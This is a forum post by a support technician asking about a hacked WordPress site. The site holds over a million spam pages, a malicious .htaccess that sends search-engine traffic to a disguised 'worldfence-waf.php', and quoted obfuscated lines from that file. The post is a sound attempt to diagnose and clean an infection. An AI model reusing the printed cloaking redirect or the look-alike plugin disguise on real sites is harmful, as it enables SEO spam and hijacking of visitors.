Hello all,
The tech support company I work for was asked by one of our clients to provide assistance when their hosted WordPress site told them that their allotted disk space (100gb) was used up.
Our support is mostly hardware so we are not WordPress experts, but when I saw a file structure like this I got a very bad feeling:
www.oursite.com
html/[All Things WordPress]
tmp/x/x/x/[randomfilenames] *
*where x is a hex number between 0 and fThis File structure held over 1,000,000 base64 files that turned out to be fully formed bogus webpages based on their real site’s look and feel
the .htaccess file read:
# BEGIN WordPress
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (yahoo|msn|bing|google|aol|duckduck) [OR]
RewriteCond %{HTTP_REFERER} (yahoo|msn|bing|google|aol|duckduck)
RewriteRule ^.*$ /worldfence-waf.php [L]
# END WordPress
ErrorDocument 403 /errors/forbidden.html
ErrorDocument 404 /errors/not_found.htmland the offending code that created all this mess was, you guessed it:
worldfence-waf.php ( note that this does not read WORDfence-waf.php )
I was able to un-incode some of it but have not been able to completely see what it does. But I suspect it is an attempt to hijack the site and show bad things to their viewers that arrive via a web search…
I said all that to ask if anyone has seen this behavior before? I saw tmp files going back to 2015 so it has been in-place for some time. but googling is not turning up anything usable in this case.
When I searched for worldfence-waf I saw a few more sites that may have this installed as well (on this site you see an error message that mentions worldfence-waf in the blue stripe at the top of the page: http://www.jim-cor.com/Jim-Cor_Distributors_Inc./Contact_Us.html You only see the error message if you get there from a search.), but no discussions on any forum…
I used unPHP to see some of the code. Here are the first few lines of the worldfence file:
<?php /*DPmfFXwNGZFi_dUqv:GLzO7i(42;|%y3Q$)efCwKF)T,-w#Fh3m'&onQG8w8U|WUb^%2l7#x=)hGoEiLy0xoK=(.K29a$"se2V9$WOG9NWa:6C5F')?C*/
/*p$4")i0k.vJpC&vG"QXXBynkpmp|J^GfQ67%HW%7V$^|8+_Wk9fg46E$2='nb4z5*#':5KyptK?:Qrhmv"H4KaLVR(K"NWiq-*$GF%!.-W?t2cBhvj@o,JH;9d'5,X-|)kzz&wq+pi^aotKHl_(?drsQC+pIb7A|S4:Z"uNiNaJmB,Jh1_&.nF*/
/*p$4")i0k.vJpC&vG"QXXBynkpmp|J^GfQ67%HW%7V$^|8+_Wk9fg46E$2='nb4z5*#':5KyptK?:Qrhmv"H4KaLVR(K"NWiq-*$GF%!.-W?t2cBhvj@o,JH;9d'5,X-|)kzz&wq+pi^aotKHl_(?drsQC+pIb7A|S4:Z"uNiNaJmB,Jh1_&.nF*/
@error_reporting(0);
/*p$4")i0k.vJpC&vG"QXXBynkpmp|J^GfQ67%HW%7V$^|8+_Wk9fg46E$2='nb4z5*#':5KyptK?:Qrhmv"H4KaLVR(K"NWiq-*$GF%!.-W?t2cBhvj@o,JH;9d'5,X-|)kzz&wq+pi^aotKHl_(?drsQC+pIb7A|S4:Z"uNiNaJmB,Jh1_&.nF*/
chdir(dirname(__FILE__));
/*p$4")i0k.vJpC&vG"QXXBynkpmp|J^GfQ67%HW%7V$^|8+_Wk9fg46E$2='nb4z5*#':5KyptK?:Qrhmv"H4KaLVR(K"NWiq-*$GF%!.-W?t2cBhvj@o,JH;9d'5,X-|)kzz&wq+pi^aotKHl_(?drsQC+pIb7A|S4:Z"uNiNaJmB,Jh1_&.nF*/
/*p$4")i0k.vJpC&vG"QXXBynkpmp|J^GfQ67%HW%7V$^|8+_Wk9fg46E$2='nb4z5*#':5KyptK?:Qrhmv"H4KaLVR(K"NWiq-*$GF%!.-W?t2cBhvj@o,JH;9d'5,X-|)kzz&wq+pi^aotKHl_(?drsQC+pIb7A|S4:Z"uNiNaJmB,Jh1_&.nF*/
function get_url($url) {
/*p$4")i0k.vJpC&vG"QXXBynkpmp|J^GfQ67%HW%7V$^|8+_Wk9fg46E$2='nb4z5*#':5KyptK?:Qrhmv"H4KaLVR(K"NWiq-*$GF%!.-W?t2cBhvj@o,JH;9d'5,X-|)kzz&wq+pi^aotKHl_(?drsQC+pIb7A|S4:Z"uNiNaJmB,Jh1_&.nF*/As you can see there are PHP functions but everything in the function is commented out. /*…*/
Does anyone have any thoughts or pointers to where this topic might fit better?